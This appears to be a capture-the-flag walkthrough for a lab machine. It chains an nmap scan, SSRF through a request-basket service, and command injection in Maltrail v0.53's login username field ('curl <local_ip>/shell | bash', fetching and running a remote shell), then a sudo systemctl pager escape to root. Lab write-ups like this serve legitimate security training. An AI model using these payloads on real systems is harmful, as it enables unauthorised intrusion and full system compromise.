Host is up (0.25s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
| 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp filtered http
55555/tcp open unknown
Overview:
By exploiting a vulnerability in Maltrail (v0.53), it's possible to achieve remote command execution on the targeted machine. This can further lead to privilege escalation, given a misconfigured sudo permission for the user "puma".
Steps:
1. Basket Creation:
First, create a basket by sending a POST request:
Endpoint: /api/baskets/tron
Payload:
{
"forward_url": "http://127.0.0.1:80/",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
Accessing the Basket:
Using any web browser or a tool like curl, navigate to the specific URL where the basket resides:
http://<ip>:55555/tron
Replace <ip> with the actual IP address of the target machine.
Expected Output:
Upon visiting the mentioned URL, you should be presented with the interface or dashboard of Maltrail, specifically version v0.53. This step is crucial as it confirms that the basket was correctly created and is now pointing to the Maltrail instance. If you don't see Maltrail's interface, it might indicate an error in prior steps or that the application is not running as expected.
What is Maltrail?
For those unfamiliar, Maltrail is a malicious traffic detection system. Version v0.53, as mentioned, has specific vulnerabilities that can be exploited.
2. Crafting a Malicious Basket:
Now, create another basket with the following details:
Endpoint: /api/baskets/tron9001
Payload:
{
"forward_url": "http://127.0.0.1:80/login",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
Send a POST request to http://<ip>:55555/tron9001 with a malicious payload:
Payload:
username=;`curl <local_ip>/shell | bash`'
This payload attempts to fetch a shell script from the <local_ip> and execute it, providing remote command execution as the user "puma".
3. Privilege Escalation:
Once you've gained a shell as "puma", run:
sudo -l
The output should be:
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
Now, using the above permission, you can exploit the systemctl command to get a shell with root privileges:
sudo /usr/bin/systemctl status trail.service
!sh
This will provide a root shell, and now you have escalated your privileges to root on the targeted system.
Congrats on making it to the climax of this article! ๐ Thanks for tuning into PornoTron9001. Come back soon, but maybe clear your browser history first. Just in case!